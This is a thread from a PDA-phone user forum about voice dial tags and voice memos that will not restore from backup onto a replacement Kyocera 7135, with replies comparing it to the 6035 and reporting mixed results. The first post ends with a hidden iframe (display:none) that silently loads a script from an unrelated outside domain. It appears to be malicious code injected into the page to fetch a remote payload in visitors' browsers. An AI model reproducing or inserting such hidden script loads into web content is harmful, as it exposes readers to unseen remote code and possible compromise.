+ Reply to Thread

Unable to restore voice items

After getting my replacement 7135 from Kyo, I restored a backup made with AdvBackup to a SD card. Everything seemed to go fine.

Today I discovered that all of my voice dials and voice memos are gone. They are in the backup folder, kwc_VoiceTags.pdb at about 3K.

I used FileZ to copy them back from the memory card. FileZ then showed them in Palm memory at 3K.

Pulling up the voice dial list showed it still empty. FileZ now shows kwc_VoiceTags as being 860 bytes.

I then HotSynced the file from my PC. Same effect.

Creating some new voice dials, backing them up, and then restoring them works. Perhaps there is some sort of phone-specific info stored in the VoiceTags database?

My voice memos were also lost. I have not tried the above tests on them (what file are they in?), but I suspect the same thing happened.

In any case, be careful with voice dials/memos. You may not be able to restore them to a new 7135.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    are you using the latest palm desktop 4.1? just curious...

That was a problem in the 6035 too.
    ~'kito
    pdaPhoneHome Moderator

You will NOT be able to restore your voice tags or anything of that sort according the user's manual.

Administrator
    if thats the case then thats a negative mark against the 7135... you can currently do this with the 6035... of course you cant record voice memos since that feature was not on the 6035, but you could store and restore the voice/speed dial #'s beginning with desktop 3.5...

Originally posted by muffdivr27
    You will NOT be able to restore your voice tags or anything of that sort according the user's manual.
    That's interesting ... because I was just able to successfully restore voice dialing to my 7135, after removing the battery for TWO hours.

I also JUST did a hard reset ... and after doing a Hotsync restore, Voice Dial Training WAS restored (after verifying BEFORE Hotsync that there were NO Voice Training entries).

FYI earlier this AM I posted a Modified FAQ, based upon my experience yesterday.

Originally posted by muffdivr27
    I am able to restore items from this 7135. I just can't restore the ones from my first 7135.